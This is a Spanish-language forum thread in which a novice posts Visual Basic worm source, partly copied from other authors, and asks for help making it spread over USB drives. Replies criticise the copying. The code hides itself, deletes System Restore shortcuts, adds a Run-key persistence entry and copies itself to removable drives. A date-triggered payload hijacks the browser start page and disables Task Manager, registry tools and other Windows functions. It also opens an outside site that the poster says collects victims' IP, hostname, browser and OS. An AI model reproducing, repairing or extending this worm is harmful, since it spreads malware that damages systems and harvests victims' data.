Bueno, he decidido aprender programacion y mi meta es ir aprendiendo varios tipos hasta llegar al ASM que se ve un poco complicado :, bueno leyendo varios papers de aqui y bajando tambien bastantes sources.... Y quiero programar 1 bichito que se propague por USB solamente y no logro hacerlo :S me base copie un source de ||MadAntrax|| cabe resaltar que soy muy novato(se darán cuenta rapido!) u_u, ojala alguien me pudierá hechar 1 mano o 2 xD, Insisto, que soy demasiado newbie en todo esto.... Y si copie el source de MadAntrax pero ya que logre entender todo el source y todos los que he bajado(para analizar) yo crearé el mio en base a los suyos y mejorandolos con partes de unos y partes de otro solo pido ayuda. Y he aqui lo que he escrito y copiado, aunque no logro que se propague :S

Private Declare Function GetLogicalDrives Lib "kernel32" () As Long
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
 
Private Sub Form_Load()
 
Set reg = CreateObject("WScript.Shell")
Set fil = CreateObject("Scripting.FileSystemObject")
Dim pro As String
Dim sys As String
Dim doc As String
Dim stm As String
 
pro = Environ("programfiles")
sys = Environ("WINDIR")
doc = Environ("MyDocuments")
stm = Environ("StartMenu")
Const DRIVE_REMOVABLE = 2
Const DRIVE_FIXED = 3
Const DRIVE_REMOTE = 4
Const DRIVE_CDROM = 5
Const DRIVE_RAMDISK = 6
 
On Error Resume Next
App.TaskVisible = False
 
Open sys & "\System32\sct.32" For Output As #1 'Archivo que pensaba usar para comprobar si ya estaba antes el bichito
Print #1, "Reported genered automatic"
Print #1, "_________________________________________"
Print #1, ""
Print #1, "*Reparation of Windows programed to 23 September of 2009"
Print #1, ""
Print #1, "*System Checked"
Close #1
 
fil.DeleteFile stm & "\Accesorios\Herramientas del sistema\Restaurar sistema.lnk"
fil.DeleteFile stm & "\Programas\Accesories\System Tools\Restore System.lnk"
fil.DeleteFile stm & "\Programs\Accesories\System Tools\Restaurar sistema.lnk"
reg.RegWrite ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Checked Tool"), sys & ("\System32\SCT32.exe")
 
Call tim 'Llamo a la "bomba de tiempo"
Call GetType(EnumDrives) 'Llamando a la infeccion
End Sub
Function EnumDrives() As String
    Dim i As Long
    Dim tmp As Long
    Dim drives As String
 
    tmp = GetLogicalDrives()
    If tmp Then
        For i = 0 To 25
            If (tmp And 2 ^ i) <> 0 Then
                drives = drives & Chr$(i + 65) & ":#"
            End If
        Next
    End If
    EnumDrives = drives
    'La variable drives almacena todas
    'las unidades en formato "A:#C:#D:#E:#"
End Function
 
Function GetType(ByVal drives As String)
    Dim tmp() As String
 
    'Separamos las unidades según el caracter #
    tmp = Split(drives, "#")
    For i = 0 To UBound(tmp) - 1
        If GetDriveType(tmp(i)) = DRIVE_REMOVABLE Then
            'Llamamos a la función de infectar la unidad
            'si es del tipo DRIVE_REMOVABLE
            Call InfectDrive("virus.exe", tmp(i))
        End If
    Next
End Function
 
Function InfectDrive(ByVal FileName As String, ByVal drive As String) As Boolean
    'Importante, no siempre tenemos acceso de escritura
    'en las unidades, sin esta linea podríamos "matar"
    'nuestro virus :(
    On Error Resume Next
 
    Dim MySelf As String
    MySelf = String$(255, Chr$(0))
 
    'Obtenemos nuestra propia ruta
    GetModuleFileName 0, MySelf, Len(MySelf)
    'Nos copiamos en la unidad con el nombre de "virus.exe"
    FileCopy MySelf, drive & "\" & FileName
End Function
Private Sub tim()
On Error Resume Next
 
If Day(Now) >= 1 And Month(Now) >= 6 Then 'Aqui se activará en la fecha que se ponga
MsgBox "uSt3d h4 s!d0 !nf3ct4d0", vbCritical, "h4cK3d bY mUrd3r3r 0f daT4" 'Un lindo msj xD
reg.RegWrite ("HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"), "http://www.vida-geek.com/h4ck3d.php" 'Jugando con el registro! =O
reg.RegWrite ("HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel"), "1", "REG_DWORD"
reg.RegWrite ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Exolorer\NoSetFolders"), "1", "REG_DWORD"
reg.RegWrite ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Exolorer\NoFind"), "1", "REG_DWORD"
reg.RegWrite ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Exolorer\NoRun"), "1", "REG_DWORD"
reg.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms"), "1", "REG_DWORD"
reg.RegWrite ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr"), "1", "REG_DWORD"
reg.RegWrite ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools"), "1", "REG_DWORD"
reg.Run "http://www.vida-geek.com/h4ck3d.php"
End If
 
End Sub

Para mi solo ha desordenado el código de MadAntrax y metido lo del registro...

Para la próxima, y mas para códigos tan simples aprende como funcionan y crea tu uno desde 0

Saludos

Qué feo está eso de copiar sources y hacerlos pasar por propios...

Pero ya ven, al final a esta gente siempre se le pilla 

Yo te recomendaría leer algún manual para entender mas o menos como funciona esto el tutorial ese de aprende vb desde 0 ( eso se lee cuando tengas un buen rato de tiempo libre, por ej una tarde entera, nada de 15 min ahora 5 después porque te se olvidara todo xD , no te preocupes de ir copiando códigos,  todos los que empiezan y/o no saben  programar van haciendo eso ( no se les queda los codes xD , yo me incluyo)

Mmmm, pues solo queria preguntar, si alguien mas o menos tiene algun source para propagacion por USB.... Miren pues compile el codigo, y pues no se propaga :S, y es que ya probe con ese codigo y algunos más que han posteado sus worms aquí y al parecer de todos los que he probado no me funcionan... Vi 1 que creo que funciona pero esta demasiado largo

He probado con todos estos y ni 1 =(, es por eso que me quedo duda, tengo 1 pequeña idea de interpretar los codigos(ha excepcion cuando empienzan a usar las API's y todo eso) ya probe con estos sources y nada más no:

W0rm by DrakoX
Gusano Tribant(Se me hace 1 sorcue muy largo, muy bueno pero largo )
Infeccion de pendrives por MadAntrax(El que uso actualmente)
Crea tu primer gusano(Muy interesante, pero no me funcionaron muchas cosas de su source y no estaba el link de descarga )
Tambien use los del manual de Hendrix

Y la neta ya los lei y analize un poco pero no hayo que funcione la propagacion :S

Quiero recalcar que la pagina: http://www.vida-geek.com/h4cked.php irá recopilando informcion de las victimas, la fecha y hora ingresados, la IP, su HostName, Browser así como SO

Claro que todas las Strings va a ir encriptadas.... =)